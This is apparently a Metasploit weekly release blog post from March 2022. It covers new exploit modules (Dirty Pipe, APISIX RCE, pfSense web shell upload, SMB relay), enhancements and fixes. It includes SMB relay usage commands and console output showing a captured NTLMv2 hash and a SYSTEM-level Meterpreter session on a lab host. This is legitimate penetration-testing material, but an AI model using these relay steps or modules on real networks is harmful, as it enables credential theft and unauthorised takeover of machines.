Metasploit Weekly Wrap-Up: Mar. 11, 2022

Last updated at Mon, 05 Feb 2024 21:44:02 GMT

Mucking out the pipes.

Thanks to some quick work by timwr, CVE-2022-0847 aka "Dirty Pipe" gives Metasploit a bit of digital plumber's training. The exploit targeting modern Linux v5 kernels helps elevate user privileges by overwriting a SUID binary of your choice by plunging some payload gold through a pipe.

Long live the SMB relay!

SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7 the windows/smb/smb_relay module that had been languishing in disuse due to evolutions in the protocol is now more helpful than ever. Users can now relay over SMB versions 2 and 3, and even select multiple targets that Metasploit will intelligently cycle through them to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation

Return of the GSoC!

The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications are will open April 4th and close April 19th. Changes this year open the program up to all newcomers of open source that are 18 years and older. Join use on #slack and checkout our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you'd like to add to Metasploit.

New module content (5)

• Wordpress MasterStudy Admin Account Creation by Numan Türle and h00die, which exploits CVE-2022-0441 - This adds an auxiliary module that leverages a sanitization issue in the Wordpress plugin MasterStudy to create an admin account in Wordpress.
• Dirty Pipe Local Privilege Escalation via CVE-2022-0847 by Max Kellermann and timwr, which exploits CVE-2022-0847 - This exploits a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite an SUID binary in order to gain privileges as the root user.
• APISIX Admin API default access token RCE by Heyder Andrade and YuanSheng Wang, which exploits CVE-2022-24112 - This adds an unauthenticated exploit targeting Apache APISIX. It leverages two vulnerabilities, the first of which is a default API key and the second is an IP restriction bypass. The result is OS command execution as the service user.
• pfSense Diag Routes Web Shell Upload by Abdel Adim "smaury" Oisfi of Shielder and jbaines-r7, which exploits CVE-2021-41282 - This PR adds a module that exploits an authenticated arbitrary file creation vulnerability in the pfSense HTTP interface.
• SMB Relay Rewrite from adfoster-r7 - Updates the SMB relay module to support relaying to targets over SMB 2 and SMB 3. It also adds intelligent targeting for multiple hosts so if the incoming authentication information is incompatible with one, the next target host will be tried.

Enhancements and features

• #16135 from sjanusz-r7 - This adds support for logging Meterpreter's TLV Packets with setg SessionTlvLogging true. Other values for the SessionTlvLogging option include console, false, and file:<file_location>.
• #16141 from adfoster-r7 - This adds service manager commands to msfconsole.
• #16219 from sjanusz-r7 - This updates the packet inspection for the enumextcmd and loadlib commands to log human readable string identifiers in addition to the integer value command ids that were introduced as part of Metasploit 6.
• #16258 from sjanusz-r7 - This improves Meterpreter's TLV logging support to show human readable names for the Meterpreter TLV values of. To view this functionality run setg SessionTlvLogging true with a Meterpreter session open. Next, run a Meterpreter command such as dir.
• #16269 from bcoles - This improves validation for Android payloads to verify Java is correctly installed and apktool.jar exists in the same directory as apktool.
• #16270 from bcoles - This improves validation for Android payloads to notify the user if a keytool error is present, such as being unable to parse the provided APK file or certificate.
• #16282 from 3V3RYONE - This adds the lcat command to Meterpreter which allows the user to cat a local file.
• #16288 from bcoles - This change display the output of apktool if the apktool output contains Java exceptions, which is useful for debugging errors in Android APK injection.

Bugs fixed

• #16145 from adfoster-r7 - This fixes a case sensitivity issue with option handling for the to_handler command on Metasploit payloads. Previously, setting an LPORT value within a payload would not correctly override the previously set lport value.
• #16153 from jmartin-r7 - This fixes a bug in the auxiliary/client/smtp/emailer which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully.
• #16265 from smashery - This fixes an edgecase which led to a running job being cleaned up twice, causing unintended errors. Now the job is only cleaned up once.
• #16268 from bwatters-r7 - This updates the check method of the exploit/windows/local/bypassuac_comhijack module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable.
• #16283 from bcoles - This change fixes an error when attempting to inject into an unsigned APK file. A suitable error message is now displayed.
• #16286 from bcoles - This fixes a payload truncation issue in post/windows/manage/persistence_exe on Windows systems caused by the usage of IO.read.
• #16294 from bcoles - This change fixes the Android APK injection functionality of msfvenom to use the new signing tool apksigner instead of jarsigner, which allows the applications to install successfully on the latest version of Android (Android 11).
• #16310 from adfoster-r7 - This fixes an edge case where setting multiple RHOST values for a module which did not support this option would cause the module to run multiple times instead of once.
• #16311 from sjanusz-r7 - This updates msfconsole's search functionality to include the 64 bit variant of payload_windows/x64/encrypted_shell payloads
• #16312 from bwatters-r7 - This fixes two issues with the pwnkit exploit for CVE-2021-4034. The first issue fixed was a compatibility check between the target host architecture and the payload. The second issue fixed was with the on session callback that sets the current working directory.
• #16322 from zeroSteiner - This fixes a regression issue with the hosts command tab completion and the --search option’s functionality.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.32...6.1.33
• Full diff 6.1.32...6.1.33

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).